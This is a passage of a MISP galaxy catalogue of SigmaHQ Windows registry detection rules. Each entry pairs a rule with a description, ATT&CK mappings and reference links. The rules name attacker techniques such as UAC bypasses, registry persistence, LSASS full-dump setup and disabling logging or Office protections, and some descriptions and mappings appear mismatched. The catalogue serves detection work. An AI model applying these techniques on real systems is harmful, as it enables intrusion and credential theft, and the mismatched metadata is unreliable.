The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Custom Protocol Handler"

Potential Persistence Via Custom Protocol Handler has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9417. Table References

Links

https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_custom_protocol_handler.yml

IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols

Detects changes to Internet Explorer’s (IE / Windows Internet properties) ZoneMap configuration of the "HTTP" and "HTTPS" protocols to point to the "My Computer" zone. This allows downloaded files from the Internet to be granted the same level of trust as files stored locally.

The tag is: misp-galaxy:sigma-rules="IE ZoneMap Setting Downgraded To MyComputer Zone For HTTP Protocols"

Table 9418. Table References

Links

https://twitter.com/M_haggis/status/1699056847154725107

https://www.virustotal.com/gui/file/339ff720c74dc44265b917b6d3e3ba0411d61f3cd3c328e9a2bae81592c8a6e5/content

https://twitter.com/JAMESWT_MHT/status/1699042827261391247

https://learn.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ie_security_zone_protocol_defaults_downgrade.yml

Blue Mockingbird - Registry

Attempts to detect system changes made by Blue Mockingbird

The tag is: misp-galaxy:sigma-rules="Blue Mockingbird - Registry"

Blue Mockingbird - Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Windows Management Instrumentation - T1047" with estimative-language:likelihood-probability="almost-certain"

Table 9419. Table References

Links

https://redcanary.com/blog/blue-mockingbird-cryptominer/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mal_blue_mockingbird.yml

Old TLS1.0/TLS1.1 Protocol Version Enabled

Detects applications or users re-enabling old TLS versions by setting the "Enabled" value to "1" for the "Protocols" registry key.

The tag is: misp-galaxy:sigma-rules="Old TLS1.0/TLS1.1 Protocol Version Enabled"

Table 9420. Table References

Links

https://techcommunity.microsoft.com/t5/windows-it-pro-blog/tls-1-0-and-tls-1-1-soon-to-be-disabled-in-windows/ba-p/3887947

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_tls_protocol_old_version_enabled.yml

Service Binary in Uncommon Folder

Detects the creation of a service with a service binary located in an uncommon directory

The tag is: misp-galaxy:sigma-rules="Service Binary in Uncommon Folder"

Service Binary in Uncommon Folder has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9421. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_creation_service_uncommon_folder.yml

Changing RDP Port to Non Standard Number

Remote desktop is a common feature in operating systems. It allows a user to log into an interactive session with a system desktop graphical user interface on a remote system. Microsoft refers to its implementation of the Remote Desktop Protocol (RDP) as Remote Desktop Services (RDS).

The tag is: misp-galaxy:sigma-rules="Changing RDP Port to Non Standard Number"

Changing RDP Port to Non Standard Number has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Port Monitors - T1547.010" with estimative-language:likelihood-probability="almost-certain"

Table 9422. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.001/T1021.001.md#atomic-test-1---rdp-to-domaincontroller

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_rdp_port.yml

Potential Persistence Via Outlook Home Page

Detects potential persistence activity via outlook home pages.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Outlook Home Page"

Potential Persistence Via Outlook Home Page has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9424. Table References

Links

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70

https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_outlook_homepage.yml

Suspicious Path In Keyboard Layout IME File Registry Value

Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message. Before doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named "Ime File" with a DLL path. IMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.

The tag is: misp-galaxy:sigma-rules="Suspicious Path In Keyboard Layout IME File Registry Value"

Suspicious Path In Keyboard Layout IME File Registry Value has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9425. Table References

Links

https://www.linkedin.com/pulse/guntior-story-advanced-bootkit-doesnt-rely-windows-disk-baranov-wue8e/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml

New Root or CA or AuthRoot Certificate to Store

Detects the addition of new root, CA or AuthRoot certificates to the Windows registry

The tag is: misp-galaxy:sigma-rules="New Root or CA or AuthRoot Certificate to Store"

New Root or CA or AuthRoot Certificate to Store has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9426. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1553.004/T1553.004.md#atomic-test-6---add-root-certificate-to-currentuser-certificate-store

https://posts.specterops.io/code-signing-certificate-cloning-attacks-and-defenses-6f98657fc6ec

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_install_root_or_ca_certificat.yml

New BgInfo.EXE Custom DB Path Registry Configuration

Detects setting of a new registry database value related to BgInfo configuration. Attackers can for example set this value to save the results of the commands executed by BgInfo in order to exfiltrate information.

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom DB Path Registry Configuration"

New BgInfo.EXE Custom DB Path Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9427. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_db.yml

UAC Bypass via Sdclt

Detects the pattern of UAC Bypass using registry key manipulation of sdclt.exe (e.g. UACMe 53)

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Sdclt"

UAC Bypass via Sdclt has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9428. Table References

Links

https://enigma0x3.net/2017/03/17/fileless-uac-bypass-using-sdclt-exe/

https://github.com/hfiref0x/UACME

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_sdclt.yml

Outlook Macro Execution Without Warning Setting Enabled

Detects the modification of Outlook security setting to allow unprompted execution of macros.

The tag is: misp-galaxy:sigma-rules="Outlook Macro Execution Without Warning Setting Enabled"

Outlook Macro Execution Without Warning Setting Enabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Event Triggered Execution - T1546" with estimative-language:likelihood-probability="almost-certain"

Table 9429. Table References

Links

https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/

https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=53

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_outlook_enable_macro_execution.yml

Trust Access Disable For VBApplications

Detects registry changes to Microsoft Office "AccessVBOM" to a value of "1" which disables trust access for VBA on the victim machine and lets attackers execute malicious macros without any Microsoft Office warnings.

The tag is: misp-galaxy:sigma-rules="Trust Access Disable For VBApplications"

Trust Access Disable For VBApplications has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9430. Table References

Links

https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/

https://twitter.com/inversecos/status/1494174785621819397

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_access_vbom_tamper.yml

Persistence Via Hhctrl.ocx

Detects when an attacker modifies the registry value of the "hhctrl" to point to a custom binary

The tag is: misp-galaxy:sigma-rules="Persistence Via Hhctrl.ocx"

Table 9431. Table References

Links

https://www.hexacorn.com/blog/2018/04/23/beyond-good-ol-run-key-part-77/

https://persistence-info.github.io/Data/hhctrl.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_hhctrl_persistence.yml

Registry Disable System Restore

Detects the modification of the registry to disable System Restore on the computer

The tag is: misp-galaxy:sigma-rules="Registry Disable System Restore"

Registry Disable System Restore has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Inhibit System Recovery - T1490" with estimative-language:likelihood-probability="almost-certain"

Table 9432. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1490/T1490.md#atomic-test-9---disable-system-restore-through-registry

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disable_system_restore.yml

Potential Persistence Via Shim Database In Uncommon Location

Detects the installation of a new shim database where the file is located in a non-default location

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Shim Database In Uncommon Location"

Potential Persistence Via Shim Database In Uncommon Location has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9433. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://www.blackhat.com/docs/asia-14/materials/Erickson/Asia-14-Erickson-Persist-It-Using-And-Abusing-Microsofts-Fix-It-Patches.pdf

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database_uncommon_location.yml

Potential Registry Persistence Attempt Via Windows Telemetry

Detects potential persistence behavior using the windows telemetry registry key. Windows telemetry makes use of the binary CompatTelRunner.exe to run a variety of commands and perform the actual telemetry collections. This binary was created to be easily extensible, and to that end, it relies on the registry to instruct on which commands to run. The problem is, it will run any arbitrary command without restriction of location or type.

The tag is: misp-galaxy:sigma-rules="Potential Registry Persistence Attempt Via Windows Telemetry"

Potential Registry Persistence Attempt Via Windows Telemetry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

Table 9434. Table References

Links

https://www.trustedsec.com/blog/abusing-windows-telemetry-for-persistence/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_telemetry_persistence.yml

PowerShell Logging Disabled Via Registry Key Tampering

Detects changes to the registry for the currently logged-in user in order to disable PowerShell module logging, script block logging, or transcription and script execution logging

The tag is: misp-galaxy:sigma-rules="PowerShell Logging Disabled Via Registry Key Tampering"

PowerShell Logging Disabled Via Registry Key Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001" with estimative-language:likelihood-probability="almost-certain"

Table 9435. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml

New BgInfo.EXE Custom WMI Query Registry Configuration

Detects the setting of a new registry value related to BgInfo configuration, which can be abused to execute a custom WMI query via "BgInfo.exe".

The tag is: misp-galaxy:sigma-rules="New BgInfo.EXE Custom WMI Query Registry Configuration"

New BgInfo.EXE Custom WMI Query Registry Configuration has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9436. Table References

Links

Internal Research

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_bginfo_custom_wmi_query.yml

Winlogon AllowMultipleTSSessions Enable

Detects when the 'AllowMultipleTSSessions' value is enabled, which allows multiple Remote Desktop connection sessions to be opened at once. This is often used by attackers as a way to connect to an RDP session without disconnecting the other users.

The tag is: misp-galaxy:sigma-rules="Winlogon AllowMultipleTSSessions Enable"

Winlogon AllowMultipleTSSessions Enable has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9437. Table References

Links

http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_winlogon_allow_multiple_tssessions.yml

Add DisallowRun Execution to Registry

Detects setting DisallowRun to 1 to prevent users from running specific programs.

The tag is: misp-galaxy:sigma-rules="Add DisallowRun Execution to Registry"

Add DisallowRun Execution to Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9438. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_disallowrun_execution.yml

IE Change Domain Zone

Hides the file extension through modification of the registry

The tag is: misp-galaxy:sigma-rules="IE Change Domain Zone"

IE Change Domain Zone has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Office Application Startup - T1137" with estimative-language:likelihood-probability="almost-certain"

Table 9439. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-4---add-domain-to-trusted-sites-zone

https://docs.microsoft.com/en-us/troubleshoot/developer/browsers/security-privacy/ie-security-zones-registry-entries

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_change_security_zones.yml

Potential Persistence Via DLLPathOverride

Detects when an attacker adds a new "DLLPathOverride" value to the "Natural Language" key in order to achieve persistence; the referenced DLL will get invoked by the "SearchIndexer.exe" process.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via DLLPathOverride"

Table 9440. Table References

Links

https://www.hexacorn.com/blog/2018/12/30/beyond-good-ol-run-key-part-98/

https://persistence-info.github.io/Data/naturallanguage6.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_natural_language.yml

Lolbas OneDriveStandaloneUpdater.exe Proxy Download

Detects setting a custom URL for OneDriveStandaloneUpdater.exe to download a file from the Internet without executing any anomalous executables with suspicious arguments. The downloaded file will be in C:\Users\redacted\AppData\Local\Microsoft\OneDrive\StandaloneUpdaterreSignInSettingsConfig.json

The tag is: misp-galaxy:sigma-rules="Lolbas OneDriveStandaloneUpdater.exe Proxy Download"

Lolbas OneDriveStandaloneUpdater.exe Proxy Download has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 9441. Table References

Links

https://lolbas-project.github.io/lolbas/Binaries/OneDriveStandaloneUpdater/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lolbin_onedrivestandaloneupdater.yml

UAC Bypass via Event Viewer

Detects UAC bypass method using Windows event viewer

The tag is: misp-galaxy:sigma-rules="UAC Bypass via Event Viewer"

UAC Bypass via Event Viewer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9442. Table References

Links

https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/

https://www.hybrid-analysis.com/sample/e122bc8bf291f15cab182a5d2d27b8db1e7019e4e96bb5cdbd1dfe7446f3f51f?environmentId=100

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_uac_bypass_eventvwr.yml

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="Wow6432Node Windows NT CurrentVersion Autorun Keys Modification"

Wow6432Node Windows NT CurrentVersion Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9443. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_wow6432node_currentversion.yml

Potential Persistence Via Mpnotify

Detects when an attacker registers a new SIP provider for persistence and defense evasion.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Mpnotify"

Table 9444. Table References

Links

https://persistence-info.github.io/Data/mpnotify.html

https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mpnotify.yml

CurrentControlSet Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="CurrentControlSet Autorun Keys Modification"

CurrentControlSet Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9445. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_currentcontrolset.yml

Potential EventLog File Location Tampering

Detects tampering with the EventLog service "file" key in order to change the default location of an Evtx file. This technique is used to tamper with log collection and alerting.

The tag is: misp-galaxy:sigma-rules="Potential EventLog File Location Tampering"

Potential EventLog File Location Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable Windows Event Logging - T1562.002" with estimative-language:likelihood-probability="almost-certain"

Table 9446. Table References

Links

https://learn.microsoft.com/en-us/windows/win32/eventlog/eventlog-key

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_evtx_file_key_tamper.yml

Add Debugger Entry To AeDebug For Persistence

Detects when an attacker adds a new "Debugger" value to the "AeDebug" key in order to achieve persistence; the configured debugger will get invoked when an application crashes.

The tag is: misp-galaxy:sigma-rules="Add Debugger Entry To AeDebug For Persistence"

Table 9447. Table References

Links

https://persistence-info.github.io/Data/aedebug.html

https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_aedebug_persistence.yml

Suspicious Application Allowed Through Exploit Guard

Detects applications being added to the "allowed applications" list of Exploit Guard in order to bypass controlled folder settings.

The tag is: misp-galaxy:sigma-rules="Suspicious Application Allowed Through Exploit Guard"

Suspicious Application Allowed Through Exploit Guard has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9448. Table References

Links

https://www.microsoft.com/security/blog/2017/10/23/windows-defender-exploit-guard-reduce-the-attack-surface-against-next-generation-malware/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_exploit_guard_susp_allowed_apps.yml

System Scripts Autorun Keys Modification

Detects modification of autostart extensibility point (ASEP) in registry.

The tag is: misp-galaxy:sigma-rules="System Scripts Autorun Keys Modification"

System Scripts Autorun Keys Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

Table 9449. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md

https://docs.microsoft.com/en-us/sysinternals/downloads/autoruns

https://gist.github.com/GlebSukhodolskiy/0fc5fa5f482903064b448890db1eaf9d

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_asep_reg_keys_modification_system_scripts.yml

RestrictedAdminMode Registry Value Tampering

Detects changes to the "DisableRestrictedAdmin" registry value in order to disable or enable RestrictedAdmin mode. RestrictedAdmin mode prevents the transmission of reusable credentials to the remote system to which you connect using Remote Desktop. This prevents your credentials from being harvested during the initial connection process if the remote server has been compromised.

The tag is: misp-galaxy:sigma-rules="RestrictedAdminMode Registry Value Tampering"

RestrictedAdminMode Registry Value Tampering has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9450. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/a8e3cf63e97b973a25903d3df9fd55da6252e564/atomics/T1112/T1112.md

https://social.technet.microsoft.com/wiki/contents/articles/32905.remote-desktop-services-enable-restricted-admin-mode.aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsa_disablerestrictedadmin.yml

Potential Persistence Via AppCompat RegisterAppRestart Layer

Detects the setting of the REGISTERAPPRESTART compatibility layer on an application. This compatibility layer allows an application to register for restart using the "RegisterApplicationRestart" API. This can be potentially abused as a persistence mechanism.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via AppCompat RegisterAppRestart Layer"

Potential Persistence Via AppCompat RegisterAppRestart Layer has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9451. Table References

Links

https://github.com/nasbench/Misc-Research/blob/d114d6a5e0a437d3818e492ef9864367152543e7/Other/Persistence-Via-RegisterAppRestart-Shim.md

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_app_cpmpat_layer_registerapprestart.yml

Lsass Full Dump Request Via DumpType Registry Settings

Detects the setting of the "DumpType" registry value to "2", which stands for a "Full Dump". Techniques such as LSASS Shtinkering require this value to be "2" in order to dump LSASS.

The tag is: misp-galaxy:sigma-rules="Lsass Full Dump Request Via DumpType Registry Settings"

Lsass Full Dump Request Via DumpType Registry Settings has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"

Table 9452. Table References

Links

https://github.com/deepinstinct/Lsass-Shtinkering

https://learn.microsoft.com/en-us/windows/win32/wer/collecting-user-mode-dumps

https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Asaf%20Gilboa%20-%20LSASS%20Shtinkering%20Abusing%20Windows%20Error%20Reporting%20to%20Dump%20LSASS.pdf

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_lsass_usermode_dumping.yml

DHCP Callout DLL Installation

Detects the installation of a Callout DLL via the CalloutDlls and CalloutEnabled parameters in the registry, which can be used to execute code in the context of the DHCP server (restart required).

The tag is: misp-galaxy:sigma-rules="DHCP Callout DLL Installation"

DHCP Callout DLL Installation has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="DLL Side-Loading - T1574.002" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

Table 9453. Table References

Links

https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx

https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html

https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml

Microsoft Office Protected View Disabled

Detects changes to Microsoft Office protected view registry keys with which the attacker disables this feature.

The tag is: misp-galaxy:sigma-rules="Microsoft Office Protected View Disabled"

Microsoft Office Protected View Disabled has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

Table 9454. Table References

Links

https://unit42.paloaltonetworks.com/unit42-gorgon-group-slithering-nation-state-cybercrime/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md

https://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview

https://yoroi.company/research/cyber-criminal-espionage-operation-insists-on-italian-manufacturing/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_disable_protected_view_features.yml

Potentially Suspicious Desktop Background Change Via Registry

Detects registry value settings that would replace the user's desktop background. This is a common technique used by malware to change the desktop background to a ransom note or other image.

The tag is: misp-galaxy:sigma-rules="Potentially Suspicious Desktop Background Change Via Registry"

Potentially Suspicious Desktop Background Change Via Registry has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

  • related-to: misp-galaxy:mitre-attack-pattern="Internal Defacement - T1491.001" with estimative-language:likelihood-probability="almost-certain"

Table 9455. Table References

Links

https://www.attackiq.com/2023/09/20/emulating-rhysida/

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI

https://research.checkpoint.com/2023/the-rhysida-ransomware-activity-analysis-and-ties-to-vice-society/

https://www.trendmicro.com/en_us/research/23/h/an-overview-of-the-new-rhysida-ransomware.html

https://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper

https://www.virustotal.com/gui/file/a864282fea5a536510ae86c77ce46f7827687783628e4f2ceb5bf2c41b8cd3c6/behavior

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_desktop_background_change.yml

Hiding User Account Via SpecialAccounts Registry Key

Detects modifications to the registry key "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\Userlist" where the value is set to "0" in order to hide a user account from being listed on the logon screen.

The tag is: misp-galaxy:sigma-rules="Hiding User Account Via SpecialAccounts Registry Key"

Hiding User Account Via SpecialAccounts Registry Key has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Hidden Users - T1564.002" with estimative-language:likelihood-probability="almost-certain"

Table 9456. Table References

Links

https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1564.002/T1564.002.md

https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml

Potential Persistence Via Shim Database Modification

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time.

The tag is: misp-galaxy:sigma-rules="Potential Persistence Via Shim Database Modification"

Potential Persistence Via Shim Database Modification has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Application Shimming - T1546.011" with estimative-language:likelihood-probability="almost-certain"

Table 9457. Table References

Links

https://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb

https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html

https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_shim_database.yml

Bypass UAC Using DelegateExecute

Bypasses User Account Control using a fileless method

The tag is: misp-galaxy:sigma-rules="Bypass UAC Using DelegateExecute"

Bypass UAC Using DelegateExecute has relationships with:

  • related-to: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

Table 9458. Table References

Links

https://docs.microsoft.com/en-us/windows/win32/api/shobjidl_core/nn-shobjidl_core-iexecutecommand

https://devblogs.microsoft.com/oldnewthing/20100312-01/?p=14623

https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md#atomic-test-7---bypass-uac-using-sdclt-delegateexecute

